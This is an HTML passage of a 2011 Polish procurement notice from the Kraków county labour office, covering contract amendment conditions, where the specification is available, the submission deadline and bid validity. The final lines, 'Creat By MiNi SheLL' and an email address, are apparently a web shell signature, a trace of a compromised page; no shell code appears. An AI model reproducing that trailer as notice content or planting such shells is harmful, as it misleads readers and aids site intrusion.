<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu rozpoczęcia zajęć pierwszej edycji określonego w harmonogramie realizacji zajęć, terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 09:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com